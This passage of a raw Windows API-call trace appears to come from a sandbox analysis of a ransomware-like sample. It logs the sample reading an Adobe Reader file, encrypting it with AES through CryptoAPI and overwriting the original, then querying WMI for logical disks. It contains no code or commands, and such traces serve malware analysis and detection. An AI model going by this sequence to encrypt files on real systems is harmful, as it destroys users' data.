lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm", lpFilePart=0x0) returned 0x34 [0175.997] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceebe8) returned 1 [0175.997] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\benioku.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5a4 [0175.997] GetFileType (hFile=0x5a4) returned 0x1 [0175.997] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceebe4) returned 1 [0175.997] GetFileType (hFile=0x5a4) returned 0x1 [0175.997] GetFileSize (in: hFile=0x5a4, lpFileSizeHigh=0x6ceecf0 | out: lpFileSizeHigh=0x6ceecf0*=0x0) returned 0x4268 [0177.450] ReadFile (in: hFile=0x5a4, lpBuffer=0x3922ffc, nNumberOfBytesToRead=0x4268, lpNumberOfBytesRead=0x6ceec9c, lpOverlapped=0x0 | out: lpBuffer=0x3922ffc*, lpNumberOfBytesRead=0x6ceec9c*=0x4268, lpOverlapped=0x0) returned 1 [0177.455] CloseHandle (hObject=0x5a4) returned 1 [0177.456] CryptAcquireContextW (in: phProv=0x6ceec3c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ceec3c*=0x7aa300) returned 1 [0177.457] CryptGenRandom (in: hProv=0x7aa300, dwLen=0x10, pbBuffer=0x39275b8 | out: pbBuffer=0x39275b8) returned 1 [0179.456] CryptImportKey (in: hProv=0x7aa300, pbData=0x3a2c908, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6ceec0c | out: phKey=0x6ceec0c*=0x77ad70) returned 1 [0179.456] CryptContextAddRef (hProv=0x7aa300, pdwReserved=0x0, dwFlags=0x0) returned 1 [0179.456] CryptContextAddRef (hProv=0x7aa300, pdwReserved=0x0, dwFlags=0x0) returned 1 [0179.456] CryptDuplicateKey (in: hKey=0x77ad70, pdwReserved=0x0, dwFlags=0x0, phKey=0x6ceebfc | out: phKey=0x6ceebfc*=0x77b070) returned 1 [0179.456] CryptContextAddRef (hProv=0x7aa300, pdwReserved=0x0, dwFlags=0x0) returned 1 [0179.456] CryptSetKeyParam (hKey=0x77b070, dwParam=0x4, pbData=0x3a2c9e8*=0x1, dwFlags=0x0) returned 1 [0179.457] CryptSetKeyParam (hKey=0x77b070, dwParam=0x1, pbData=0x3a2c9b4, dwFlags=0x0) returned 1 [0179.457] CryptEncrypt (in: hKey=0x77b070, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3a2c9f8*, pdwDataLen=0x6ceec68*=0x4270, dwBufLen=0x4270 | out: pbData=0x3a2c9f8*, pdwDataLen=0x6ceec68*=0x4270) returned 1 [0179.457] CryptEncrypt (in: hKey=0x77b070, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3a30c8c*, pdwDataLen=0x6ceec70*=0x0, dwBufLen=0x10 | out: pbData=0x3a30c8c*, pdwDataLen=0x6ceec70*=0x10) returned 1 [0179.461] CryptDestroyKey (hKey=0x77ad70) returned 1 [0179.462] CryptReleaseContext (hProv=0x7aa300, dwFlags=0x0) returned 1 [0179.462] CryptReleaseContext (hProv=0x7aa300, dwFlags=0x0) returned 1 [0179.462] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm", nBufferLength=0x105, lpBuffer=0x6cee6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm", lpFilePart=0x0) returned 0x34 [0179.462] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceebd4) returned 1 [0179.462] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\benioku.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3dc [0179.462] GetFileType (hFile=0x3dc) returned 0x1 [0179.462] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceebd0) returned 1 [0179.463] GetFileType (hFile=0x3dc) returned 0x1 [0179.463] WriteFile (in: hFile=0x3dc, lpBuffer=0x3a44440*, nNumberOfBytesToWrite=0x4480, lpNumberOfBytesWritten=0x6ceec90, lpOverlapped=0x0 | out: lpBuffer=0x3a44440*, lpNumberOfBytesWritten=0x6ceec90*=0x4480, lpOverlapped=0x0) returned 1 [0179.464] CloseHandle (hObject=0x3dc) returned 1 [0179.465] CoTaskMemAlloc (cb=0x20c) returned 0x6f2ec08 [0179.465] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x6f2ec08 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0179.465] CoTaskMemFree (pv=0x6f2ec08) [0179.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6cee6c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0179.465] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ceec10 | out: ppv=0x6ceec10*=0x72015c) returned 0x0 [0179.466] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6ceec08 | out: pAptType=0x6ceec08*=1) returned 0x0 [0179.466] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ceec0c | out: ppvObject=0x6ceec0c*=0x0) returned 0x80004002 [0179.466] IUnknown:Release (This=0x72015c) returned 0x1 [0179.467] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6cee578 | out: ppv=0x6cee578*=0x67373a0) returned 0x0 [0179.467] WbemDefPath:IUnknown:QueryInterface (in: This=0x67373a0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee790 | out: ppvObject=0x6cee790*=0x0) returned 0x80004002 [0179.467] WbemDefPath:IClassFactory:CreateInstance (in: This=0x67373a0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee7a4 | out: ppvObject=0x6cee7a4*=0x67340d0) returned 0x0 [0179.467] WbemDefPath:IUnknown:Release (This=0x67373a0) returned 0x0 [0179.467] WbemDefPath:IUnknown:QueryInterface (in: This=0x67340d0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee3c4 | out: ppvObject=0x6cee3c4*=0x67340d0) returned 0x0 [0179.467] WbemDefPath:IUnknown:QueryInterface (in: This=0x67340d0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee380 | out: ppvObject=0x6cee380*=0x0) returned 0x80004002 [0179.468] WbemDefPath:IUnknown:AddRef (This=0x67340d0) returned 0x3 [0179.468] WbemDefPath:IUnknown:QueryInterface (in: This=0x67340d0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cedcdc | out: ppvObject=0x6cedcdc*=0x0) returned 0x80004002 [0179.468] WbemDefPath:IUnknown:QueryInterface (in: This=0x67340d0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cedc8c | out: ppvObject=0x6cedc8c*=0x0) returned 0x80004002 [0179.468] WbemDefPath:IUnknown:QueryInterface (in: This=0x67340d0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cedc98 | out: ppvObject=0x6cedc98*=0x9820d88) returned 0x0 [0179.468] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x9820d88, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6cedca0 | out: pCid=0x6cedca0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0179.468] WbemDefPath:IUnknown:Release (This=0x9820d88) returned 0x3 [0179.468] CoGetContextToken (in: pToken=0x6cedcf8 | out: pToken=0x6cedcf8) returned 0x0 [0179.468] CoGetContextToken (in: pToken=0x6cee100 | out: pToken=0x6cee100) returned 0x0 [0179.468] WbemDefPath:IUnknown:QueryInterface (in: This=0x67340d0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee190 | out: ppvObject=0x6cee190*=0x0) returned 0x80004002 [0179.468] WbemDefPath:IUnknown:Release (This=0x67340d0) returned 0x2 [0179.468] WbemDefPath:IUnknown:Release (This=0x67340d0) returned 0x1 [0179.468] CoGetContextToken (in: pToken=0x6ceea88 | out: pToken=0x6ceea88) returned 0x0 [0179.468] CoGetContextToken (in: pToken=0x6cee9e8 | out: pToken=0x6cee9e8) returned 0x0 [0179.468] WbemDefPath:IUnknown:QueryInterface (in: This=0x67340d0, riid=0x6ceeab8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ceeab4 | out: ppvObject=0x6ceeab4*=0x67340d0) returned 0x0 [0179.468] WbemDefPath:IUnknown:AddRef (This=0x67340d0) returned 0x3 [0179.469] WbemDefPath:IUnknown:Release (This=0x67340d0) returned 0x2 [0179.469] WbemDefPath:IWbemPath:SetText (This=0x67340d0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0179.469] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67340d0, puCount=0x6ceec3c | out: puCount=0x6ceec3c*=0x0) returned 0x0 [0179.469] WbemDefPath:IWbemPath:GetText (in: This=0x67340d0, lFlags=2, puBuffLength=0x6ceec38*=0x0, pszText=0x0 | out: puBuffLength=0x6ceec38*=0x20, pszText=0x0) returned 0x0 [0179.469] WbemDefPath:IWbemPath:GetText (in: This=0x67340d0, lFlags=2, puBuffLength=0x6ceec38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6ceec38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0179.469] WbemDefPath:IWbemPath:GetInfo (in: This=0x67340d0, uRequestedInfo=0x0, puResponse=0x6ceec44 | out: puResponse=0x6ceec44*=0xc19) returned 0x0 [0179.469] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67340d0, puCount=0x6ceec3c | out: puCount=0x6ceec3c*=0x0) returned 0x0 [0179.469] WbemDefPath:IWbemPath:GetInfo (in: This=0x67340d0, uRequestedInfo=0x0, puResponse=0x6ceec44 | out: puResponse=0x6ceec44*=0xc19) returned 0x0 [0179.469] WbemDefPath:IWbemPath:GetInfo (in: This=0x67340d0, uRequestedInfo=0x0, puResponse=0x6ceec44 | out: puResponse=0x6ceec44*=0xc19) returned 0x0 [0179.469] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67340d0, puCount=0x6ceebbc | out: puCount=0x6ceebbc*=0x0) returned 0x0 [0179.469] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x6ceeba8 | out: puCount=0x6ceeba8*=0x2) returned 0x0 [0179.469] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6ceeba4*=0x0, pszText=0x0 | out: puBuffLength=0x6ceeba4*=0xf, pszText=0x0) returned 0x0 [0179.469] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6ceeba4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceeba4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0179.469] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ceeb58 | out: ppv=0x6ceeb58*=0x72015c) returned 0x0 [0179.469] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6ceeb50 | out: pAptType=0x6ceeb50*=1) returned 0x0 [0179.469] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ceeb54 | out: ppvObject=0x6ceeb54*=0x0) returned 0x80004002 [0179.469] IUnknown:Release (This=0x72015c) returned 0x1 [0179.470] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6cee4c0 | out: ppv=0x6cee4c0*=0x6737420) returned 0x0 [0179.471] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737420, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee6d8 | out: ppvObject=0x6cee6d8*=0x0) returned 0x80004002 [0179.471] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6737420, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee6ec | out: ppvObject=0x6cee6ec*=0x6734140) returned 0x0 [0179.471] WbemDefPath:IUnknown:Release (This=0x6737420) returned 0x0 [0179.471] WbemDefPath:IUnknown:QueryInterface (in: This=0x6734140, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee30c | out: ppvObject=0x6cee30c*=0x6734140) returned 0x0 [0179.471] WbemDefPath:IUnknown:QueryInterface (in: This=0x6734140, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee2c8 | out: ppvObject=0x6cee2c8*=0x0) returned 0x80004002 [0179.471] WbemDefPath:IUnknown:AddRef (This=0x6734140) returned 0x3 [0179.471] WbemDefPath:IUnknown:QueryInterface (in: This=0x6734140, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cedc24 | out: ppvObject=0x6cedc24*=0x0) returned 0x80004002 [0179.471] WbemDefPath:IUnknown:QueryInterface (in: This=0x6734140, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cedbd4 | out: ppvObject=0x6cedbd4*=0x0) returned 0x80004002 [0179.471] WbemDefPath:IUnknown:QueryInterface (in: This=0x6734140, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cedbe0 | out: ppvObject=0x6cedbe0*=0x9820db8) returned 0x0 [0179.471] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x9820db8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6cedbe8 | out: pCid=0x6cedbe8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0179.471] WbemDefPath:IUnknown:Release (This=0x9820db8) returned 0x3 [0179.471] CoGetContextToken (in: pToken=0x6cedc40 | out: pToken=0x6cedc40) returned 0x0 [0179.471] CoGetContextToken (in: pToken=0x6cee048 | out: pToken=0x6cee048) returned 0x0 [0179.472] WbemDefPath:IUnknown:QueryInterface (in: This=0x6734140, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee0d8 | out: ppvObject=0x6cee0d8*=0x0) returned 0x80004002 [0179.472] WbemDefPath:IUnknown:Release (This=0x6734140) returned 0x2 [0179.472] WbemDefPath:IUnknown:Release (This=0x6734140) returned 0x1 [0179.472] CoGetContextToken (in: pToken=0x6cee9d0 | out: pToken=0x6cee9d0) returned 0x0 [0179.472] CoGetContextToken (in: pToken=0x6cee930 | out: pToken=0x6cee930) returned 0x0 [0179.472] WbemDefPath:IUnknown:QueryInterface (in: This=0x6734140, riid=0x6ceea00*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6cee9fc | out: ppvObject=0x6cee9fc*=0x6734140) returned 0x0 [0179.472] WbemDefPath:IUnknown:AddRef (This=0x6734140) returned 0x3 [0179.472] WbemDefPath:IUnknown:Release (This=0x6734140) returned 0x2 [0179.472] WbemDefPath:IWbemPath:SetText (This=0x6734140, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0179.472] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6734140, puCount=0x6ceeb80 | out: puCount=0x6ceeb80*=0x2) returned 0x0 [0179.472] WbemDefPath:IWbemPath:GetText (in: This=0x6734140, lFlags=4, puBuffLength=0x6ceeb7c*=0x0, pszText=0x0 | out: puBuffLength=0x6ceeb7c*=0xf, pszText=0x0) returned 0x0 [0179.472] WbemDefPath:IWbemPath:GetText (in: This=0x6734140, lFlags=4, puBuffLength=0x6ceeb7c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceeb7c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0179.472] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ceeb80 | out: ppv=0x6ceeb80*=0x72015c) returned 0x0 [0179.472] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6ceeb78 | out: pAptType=0x6ceeb78*=1) returned 0x0 [0179.472] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ceeb7c | out: ppvObject=0x6ceeb7c*=0x0) returned 0x80004002 [0179.472] IUnknown:Release (This=0x72015c) returned 0x1 [0179.473] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6cee7a0 | out: ppv=0x6cee7a0*=0x673d2e8) returned 0x0 [0179.473] WbemLocator:IUnknown:QueryInterface (in: This=0x673d2e8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee9b8 | out: ppvObject=0x6cee9b8*=0x0) returned 0x80004002 [0179.473] WbemLocator:IClassFactory:CreateInstance (in: This=0x673d2e8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee9cc | out: ppvObject=0x6cee9cc*=0x6737430) returned 0x0 [0179.473] WbemLocator:IUnknown:Release (This=0x673d2e8) returned 0x0 [0179.473] WbemLocator:IUnknown:QueryInterface (in: This=0x6737430, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee5ec | out: ppvObject=0x6cee5ec*=0x6737430) returned 0x0 [0179.473] WbemLocator:IUnknown:QueryInterface (in: This=0x6737430, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee5a8 | out: ppvObject=0x6cee5a8*=0x0) returned 0x80004002 [0179.473] WbemLocator:IUnknown:AddRef (This=0x6737430) returned 0x3 [0179.473] WbemLocator:IUnknown:QueryInterface (in: This=0x6737430, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cedf04 | out: ppvObject=0x6cedf04*=0x0) returned 0x80004002 [0179.474] WbemLocator:IUnknown:QueryInterface (in: This=0x6737430, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cedeb4 | out: ppvObject=0x6cedeb4*=0x0) returned 0x80004002 [0179.474] WbemLocator:IUnknown:QueryInterface (in: This=0x6737430, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cedec0 | out: ppvObject=0x6cedec0*=0x0) returned 0x80004002 [0179.474] CoGetContextToken (in: pToken=0x6cedf20 | out: pToken=0x6cedf20) returned 0x0 [0179.474] CoGetContextToken (in: pToken=0x6cee328 | out: pToken=0x6cee328) returned 0x0 [0179.474] WbemLocator:IUnknown:QueryInterface (in: This=0x6737430, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee3b8 | out: ppvObject=0x6cee3b8*=0x0) returned 0x80004002 [0179.474] WbemLocator:IUnknown:Release (This=0x6737430) returned 0x2 [0179.474] WbemLocator:IUnknown:Release (This=0x6737430) returned 0x1 [0179.474] CoGetContextToken (in: pToken=0x6cee998 | out: pToken=0x6cee998) returned 0x0 [0179.474] CoGetContextToken (in: pToken=0x6cee8f8 | out: pToken=0x6cee8f8) returned 0x0 [0179.474] WbemLocator:IUnknown:QueryInterface (in: This=0x6737430, riid=0x6cee9c8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6cee9c4 | out: ppvObject=0x6cee9c4*=0x6737430) returned 0x0 [0179.474] WbemLocator:IUnknown:AddRef (This=0x6737430) returned 0x3 [0179.474] WbemLocator:IUnknown:Release (This=0x6737430) returned 0x2 [0179.474] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6734140, puCount=0x6ceeb5c | out: puCount=0x6ceeb5c*=0x2) returned 0x0 [0179.474] WbemDefPath:IWbemPath:GetText (in: This=0x6734140, lFlags=8, puBuffLength=0x6ceeb58*=0x0, pszText=0x0 | out: puBuffLength=0x6ceeb58*=0xf, pszText=0x0) returned 0x0 [0179.474] WbemDefPath:IWbemPath:GetText (in: This=0x6734140, lFlags=8, puBuffLength=0x6ceeb58*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceeb58*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0179.474] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6ceea34 | out: ppv=0x6ceea34*=0x6737480) returned 0x0 [0179.581] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6737480, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6ceeac8 | out: ppNamespace=0x6ceeac8*=0x6748104) returned 0x0 [0188.992] WbemLocator:IUnknown:QueryInterface (in: This=0x6748104, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee964 | out: ppvObject=0x6cee964*=0x781094) returned 0x0 [0188.992] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781094, pProxy=0x6748104, 